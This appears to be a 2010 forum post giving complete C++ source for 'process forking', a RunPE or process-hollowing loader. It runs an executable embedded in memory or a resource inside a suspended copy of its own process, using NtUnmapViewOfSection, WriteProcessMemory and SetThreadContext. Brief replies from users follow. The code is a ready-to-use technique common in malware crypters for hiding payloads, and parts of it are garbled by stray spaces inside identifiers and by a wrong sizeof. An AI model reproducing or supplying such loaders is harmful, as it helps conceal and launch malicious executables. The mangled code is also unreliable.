It allows you to run a process from a resource or memory and not a file. This creates a separate process.In computing, when a process forks, it creates a copy of itself. More generally, a fork in a multithreading environment means that a thread of execution is duplicated, creating a child thread from the parent thread.
If you want to run a process from within the stub process instead of creating a new process, this can be achieved with something similar to this code. However, it takes a lot more work and a lot more things would need fixing for it to work 100%. But you could eventually use CreateThread() on the Entry point.
//--------------------------------------------------------
// Dynamic Process Forking of Portable Executable
// Author : Vrillon / Venus
// Date : 07/14/2008
//--------------------------------------------------------
/************************************************** *******/
/* With this header, you can create and run a process */
/* from memory and not from a file. */
/************************************************** *******/
#ifdef WIN32
#include <windows.h>
#else
#error Process Forking Requires a Windows Operating System
#endif
#include <stdio.h>
/////////////////////////////////////////////////////////////
// NtUnmapViewOfSection (ZwUnmapViewOfSection)
// Used to unmap a section from a process.
typedef long int (__stdcall* NtUnmapViewOfSectionF)(HANDLE,PVOID);
NtUnmapViewOfSectionF NtUnmapViewOfSection = (NtUnmapViewOfSectionF)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtUnmapViewOfSection");
/////////////////////////////////////////////////////////////
// Fork Process
// Dynamically create a process based on the parameter 'lpImage'. The parameter should have the entire
// image of a portable executable file from address 0 to the end.
bool ForkProcess(LPVOID lpImage)
{
// Variables for Process Forking
long int lWritten;
long int lHeaderSize;
long int lImageSize;
long int lSectionCount;
long int lSectionSize;
long int lFirstSection;
long int lPreviousProtection;
long int lJumpSize;
bool bReturnValue;
LPVOID lpImageMemory;
LPVOID lpImageMemoryDummy;
IMAGE_DOS_HEADER dsDosHeader;
IMAGE_NT_HEADERS ntNtHeader;
IMAGE_SECTION_HEADER shSections[512 * 2];
PROCESS_INFORMATION piProcessInformation;
STARTUPINFO suStartUpInformation;
CONTEXT cContext;
// Variables for Local Process
FILE* fFile;
char* pProcessName;
long int lFileSize;
long int lLocalImageBase;
long int lLocalImageSize;
LPVOID lpLocalFile;
IMAGE_DOS_HEADER dsLocalDosHeader;
IMAGE_NT_HEADERS ntLocalNtHeader;
// End Variable Definition
bReturnValue = false;
pProcessName = new char[MAX_PATH];
ZeroMemory(pProcessName,MAX_PATH);
// Get the file name for the dummy process
if(GetModuleFileName(NULL,pProcessName,MAX_PATH) == 0)
{
delete [] pProcessName;
return bReturnValue;
}
// Open the dummy process in binary mode
fFile = fopen(pProcessName,"rb");
if(!fFile)
{
delete [] pProcessName;
return bReturnValue;
}
fseek(fFile,0,SEEK_END);
// Get file size
lFileSize = ftell(fFile);
rewind(fFile);
// Allocate memory for dummy file
lpLocalFile = new LPVOID[lFileSize];
ZeroMemory(lpLocalFile,lFileSize);
// Read memory of file
fread(lpLocalFile,lFileSize,1,fFile);
// Close file
fclose(fFile);
// Grab the DOS Headers
memcpy(&dsLocalDosHeader,lpLocalFile,sizeof(dsLoca lDosHeader));
if(dsLocalDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}
// Grab NT Headers
memcpy(&ntLocalNtHeader,(LPVOID)((long int)lpLocalFile+dsLocalDosHeader.e_lfanew),sizeof( dsLocalDosHeader));
if(ntLocalNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}
// Get Size and Image Base
lLocalImageBase = ntLocalNtHeader.OptionalHeader.ImageBase;
lLocalImageSize = ntLocalNtHeader.OptionalHeader.SizeOfImage;
// Deallocate
delete [] lpLocalFile;
// Grab DOS Header for Forking Process
memcpy(&dsDosHeader,lpImage,sizeof(dsDosHeader));
if(dsDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}
// Grab NT Header for Forking Process
memcpy(&ntNtHeader,(LPVOID)((long int)lpImage+dsDosHeader.e_lfanew),sizeof(ntNtHeade r));
if(ntNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}
// Get proper sizes
lImageSize = ntNtHeader.OptionalHeader.SizeOfImage;
lHeaderSize = ntNtHeader.OptionalHeader.SizeOfHeaders;
// Allocate memory for image
lpImageMemory = new LPVOID[lImageSize];
ZeroMemory(lpImageMemory,lImageSize);
lpImageMemoryDummy = lpImageMemory;
lFirstSection = (long int)(((long int)lpImage+dsDosHeader.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
memcpy(shSections,(LPVOID)(lFirstSection),sizeof(I MAGE_SECTION_HEADER)*ntNtHeader.FileHeader.NumberO fSections);
memcpy(lpImageMemoryDummy,lpImage,lHeaderSize);
// Get Section Alignment
if((ntNtHeader.OptionalHeader.SizeOfHeaders % ntNtHeader.OptionalHeader.SectionAlignment) == 0)
{
lJumpSize = ntNtHeader.OptionalHeader.SizeOfHeaders;
}
else
{
lJumpSize = (ntNtHeader.OptionalHeader.SizeOfHeaders/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}
lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);
// Copy Sections To Buffer
for(lSectionCount = 0; lSectionCount < ntNtHeader.FileHeader.NumberOfSections; lSectionCount++)
{
lJumpSize = 0;
lSectionSize = shSections[lSectionCount].SizeOfRawData;
memcpy(lpImageMemoryDummy,(LPVOID)((long int)lpImage + shSections[lSectionCount].PointerToRawData),lSectionSize);
if((shSections[lSectionCount].Misc.VirtualSize % ntNtHeader.OptionalHeader.SectionAlignment)==0)
{
lJumpSize = shSections[lSectionCount].Misc.VirtualSize;
}
else
{
lJumpSize = (shSections[lSectionCount].Misc.VirtualSize/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}
lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);
}
ZeroMemory(&suStartUpInformation,sizeof(STARTUPINF O));
ZeroMemory(&piProcessInformation,sizeof(PROCESS_IN FORMATION));
ZeroMemory(&cContext,sizeof(CONTEXT));
suStartUpInformation.cb = sizeof(suStartUpInformation);
// Create Process
if(CreateProcess(NULL,pProcessName,NULL,NULL,false ,CREATE_SUSPENDED,NULL,NULL,&suStartUpInformation, &piProcessInformation))
{
cContext.ContextFlags = CONTEXT_FULL;
GetThreadContext(piProcessInformation.hThread,&cCo ntext);
// Check image base and image size
if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
{
VirtualProtectEx(piProcessInformation.hProcess,(LP VOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSiz e,PAGE_EXECUTE_READWRITE,(unsigned long*)&lPreviousProtection);
}
else
{
if(!NtUnmapViewOfSection(piProcessInformation.hPro cess,(LPVOID)((DWORD)lLocalImageBase)))
VirtualAllocEx(piProcessInformation.hProcess,(LPVO ID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSiz e,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
}
// Write Image to Process
if(WriteProcessMemory(piProcessInformation.hProces s,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lpImageMe mory,lImageSize,(unsigned long*)&lWritten))
{
bReturnValue = true;
}
// Set Image Base
if(WriteProcessMemory(piProcessInformation.hProces s,(LPVOID)((long int)cContext.Ebx + 8),&ntNtHeader.OptionalHeader.ImageBase,4,(unsigne d long*)&lWritten))
{
if(bReturnValue == true)
bReturnValue = true;
}
if(bReturnValue == false)
{
delete [] pProcessName;
delete [] lpImageMemory;
return bReturnValue;
}
// Set the new entry point
cContext.Eax = ntNtHeader.OptionalHeader.ImageBase + ntNtHeader.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(piProcessInformation.hThread,&cCo ntext);
if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
VirtualProtectEx(piProcessInformation.hProcess,(LP VOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSiz e,lPreviousProtection,0);
// Resume the process
ResumeThread(piProcessInformation.hThread);
}
delete [] pProcessName;
delete [] lpImageMemory;
return bReturnValue;
}
// Fork Process From Resource
// Dynamically create a process from a resource file.
bool ForkProcessFromResource(int iResource,char* pResourceSection)
{
HGLOBAL hResData;
HRSRC hResInfo;
LPVOID lpRes;
LPVOID lpMemory;
long int lSize;
HMODULE hModule;
bool bReturn;
hModule = GetModuleHandle(0);
bReturn = false;
if(!hModule)
return bReturn;
hResInfo = FindResource(hModule, MAKEINTRESOURCE(iResource), pResourceSection);
if(!hResInfo)
{
return bReturn;
}
hResData = LoadResource(hModule, hResInfo);
if(!hResData)
{
return bReturn;
}
lpRes = LockResource(hResData);
if(!lpRes)
{
FreeResource(hResData);
return bReturn;
}
lSize = SizeofResource(hModule, hResInfo);
lpMemory = new LPVOID[lSize];
ZeroMemory(lpMemory,lSize);
memcpy (lpMemory, lpRes, lSize);
bReturn = ForkProcess(lpMemory);
FreeResource(hResData);
delete [] lpMemory;
return bReturn;
}
Can be used like this:
ForkProcess(pointer to executable memory);
or
ForkProcessFromResource(IDE_FILE1,"EXE"); (If you wanna load it from a resource)
by Vrillon
Results 1 to 3 of 3
-
2010-11-29, 04:03 PM #1VeteranDwar
- Join Date
- 2010 Mar
- Posts
- 2,222
- Thanks
- 211
- Thanks
- 2,230
- Thanked in
- 292 Posts
- Rep Power
- 10
[C++] Process Forking - Running Process From Memory
Please, post your questions on forum, not by PM or mail
I spend my time, so please pay a little bit of your time to keep world in equilibrium
-
The Following User Says Thank You to Dwar For This Useful Post:
-
-
2013-03-06, 09:59 PM #2Guestsecuredsolution
- Join Date
- 2013 Mar
- Posts
- 1
- Thanks
- 0
- Thanks
- 0
- Thanked in
- 0 Posts
- Rep Power
- 0
Error
I get the following access violation error during runtime
LeadDown2:
I am running Windows 8 x64Code:mov al,[esi+3] ;U - load first byte
-
2018-04-02, 04:48 PM #3Inactivebobsadino
- Join Date
- 2018 Apr
- Posts
- 1
- Thanks
- 0
- Thanks
- 0
- Thanked in
- 0 Posts
- Rep Power
- 0
how to execute LPIMAGE?
Should i convert exe to bytes of a ray?
0x0034, 0x00334, 0x3434...
Reply With Quote